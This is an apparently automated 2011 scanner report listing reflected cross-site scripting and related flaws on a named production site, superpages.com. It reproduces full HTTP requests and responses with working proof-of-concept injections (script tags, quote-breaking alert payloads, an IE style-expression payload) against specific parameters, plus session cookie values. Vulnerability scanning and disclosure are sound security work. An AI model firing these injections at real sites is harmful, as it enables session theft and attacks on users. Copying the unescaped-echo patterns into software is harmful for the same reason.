XSS, www.superpages.com, Cross Site Scripting, CWE-79

XSS in www.superpages.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 12:58:53 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.3. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.4. http://www.superpages.com/bp/Facebook [REST URL parameter 2]

1.5. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [PGID parameter]

1.6. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 2]

1.7. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 3]

1.8. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

1.9. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

1.10. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [TR parameter]

1.11. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [bidType parameter]

1.12. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [lbp parameter]

1.13. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]

1.14. http://www.superpages.com/bp/xmlproxy [REST URL parameter 2]

1.15. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]

1.16. http://www.superpages.com/inc/social/sln.php [REST URL parameter 3]

1.17. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

1.18. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

1.19. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

1.20. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

1.21. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [User-Agent HTTP header]

2. Session token in URL

3. Cookie without HttpOnly flag set

3.1. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

3.2. http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9

3.3. http://www.superpages.com/coupons

3.4. http://www.superpages.com/mobile/

3.5. http://www.superpages.com/

3.6. http://www.superpages.com/about/copyright.html

3.7. http://www.superpages.com/about/privacy.html

3.8. http://www.superpages.com/bp/

3.9. http://www.superpages.com/bp/US/javascript:%20return%20validate()

3.10. http://www.superpages.com/bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg')

3.11. http://www.superpages.com/cities

3.12. http://www.superpages.com/cities/

3.13. http://www.superpages.com/css/fall.css

3.14. http://www.superpages.com/inc/s_code.js

3.15. http://www.superpages.com/inc/social/sln.php

3.16. http://www.superpages.com/inc/social/soc.css

3.17. http://www.superpages.com/inc/social/soc.php

3.18. http://www.superpages.com/js/promo.js

3.19. http://www.superpages.com/vorpal/jabberwocky.cgi

3.20. http://www.superpages.com/yellowpages/C-Banks

4. Cookie scoped to parent domain

5. Cross-domain Referer leakage

5.1. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

5.2. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

5.3. http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9

6. Cross-domain script include

6.1. http://www.superpages.com/

6.2. http://www.superpages.com/about/copyright.html

6.3. http://www.superpages.com/about/privacy.html

6.4. http://www.superpages.com/bp/

6.5. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

6.6. http://www.superpages.com/bp/US/javascript:%20return%20validate()

6.7. http://www.superpages.com/bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg')

6.8. http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9

6.9. http://www.superpages.com/cities/

6.10. http://www.superpages.com/coupons

6.11. http://www.superpages.com/vorpal/jabberwocky.cgi

6.12. http://www.superpages.com/yellowpages/C-Banks

7. File upload functionality

8. Email addresses disclosed

8.1. http://www.superpages.com/

8.2. http://www.superpages.com/about/copyright.html

8.3. http://www.superpages.com/about/privacy.html

8.4. http://www.superpages.com/bp/

8.5. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

8.6. http://www.superpages.com/bp/US/javascript:%20return%20validate()

8.7. http://www.superpages.com/bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg')

8.8. http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9

8.9. http://www.superpages.com/cities/

8.10. http://www.superpages.com/coupons

8.11. http://www.superpages.com/vorpal/jabberwocky.cgi

8.12. http://www.superpages.com/yellowpages/C-Banks



1. Cross-site scripting (reflected)  next
There are 21 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2fa"><script>alert(1)</script>887ac555049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ab2fa"><script>alert(1)</script>887ac555049=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:12 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:14 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link media="screen, projection" type="text/css" HREF="http://www.superpages.com/css/header.css?SRC=&ab2fa"><script>alert(1)</script>887ac555049=1" rel="stylesheet" />
...[SNIP]...

1.2. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3044--><script>alert(1)</script>9a336ccd25a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?b3044--><script>alert(1)</script>9a336ccd25a=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:20 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:20 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="?SRC=&b3044--><script>alert(1)</script>9a336ccd25a=1#" rel="nofollow">
...[SNIP]...

1.3. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c040f'-alert(1)-'b2565b0ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c040f'-alert(1)-'b2565b0ba7=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:16 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:16 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&c040f'-alert(1)-'b2565b0ba7=1" rel="nofollow">
...[SNIP]...

1.4. http://www.superpages.com/bp/Facebook [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/Facebook

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45f"-alert(1)-"161ba1e0a00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/Facebookce45f"-alert(1)-"161ba1e0a00 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=F81968BB9B8C6E79A245B67095187467; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 57268
Date: Thu, 03 Feb 2011 17:06:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/bp/Facebookce45f"-alert(1)-"161ba1e0a00?=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.5. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [PGID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the PGID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44e9"-alert(1)-"ac1eec3d3bf was submitted in the PGID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750566133-www.superpages.com-18392944-855020; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:29:26 GMT; Path=/
Set-Cookie: JSESSIONID=15DD6E10C9F988449C56134A74598F9A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:29:25 GMT
Content-Length: 66686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
ype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

1.6. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f735"-alert(1)-"5e13c75896f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750717878-www.superpages.com-25570824-638833; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:57 GMT; Path=/
Set-Cookie: JSESSIONID=5C32A1099510A145A292891057754A90; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:57 GMT
Content-Length: 66498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
tp://yellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'ht
...[SNIP]...

1.7. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7a3"-alert(1)-"d9426b3b370 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750760787-www.superpages.com-11101702-780397; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:32:40 GMT; Path=/
Set-Cookie: JSESSIONID=82629E94B8FADDDBFF9B5C6A1B6BECC4; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:40 GMT
Content-Length: 18489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
gescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.8. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the SRC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02 was submitted in the SRC parameter. This input was echoed as 8c3a4"style="x:expression(alert(1))"d28cbb2cb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750439498-www.superpages.com-4789827-628076; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:19 GMT; Path=/
Set-Cookie: JSESSIONID=8C15D1E521D5C7BAD68D0A53F9577955; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:27:18 GMT
Content-Length: 128435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a href="http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toBusinesses&SRC=comlocal1a8c3a4"style="x:expression(alert(1))"d28cbb2cb02" rel="nofollow" onClick="clickTrackTabs('GT','MySuperpages', 'yp_profile');">
...[SNIP]...

1.9. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ebe9"%3balert(1)//fc3f4c0a516 was submitted in the SRC parameter. This input was echoed as 3ebe9";alert(1)//fc3f4c0a516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a3ebe9"%3balert(1)//fc3f4c0a516&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750452826-www.superpages.com-16809597-702534; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:32 GMT; Path=/
Set-Cookie: JSESSIONID=4CDE972A6F7062265EBD4234C3250381; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:27:33 GMT
Content-Length: 126537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
ww.superpages.com";
s.prop5 = "Advanced Search, Business Profile";
s.prop9 = "Advanced Search";
s.eVar23 = "Advanced Search";
s.hier1 = "Advanced Search, Business Profile";
var s_campaign = "comlocal1a3ebe9";alert(1)//fc3f4c0a516";
if(s_campaign){
s.campaign = s_campaign;
}
var s_code = s.t();
if(s_code)
document.writeln(s_code);
//-->
...[SNIP]...

1.10. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [TR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the TR request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843a2"-alert(1)-"a8e7c8583e3 was submitted in the TR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
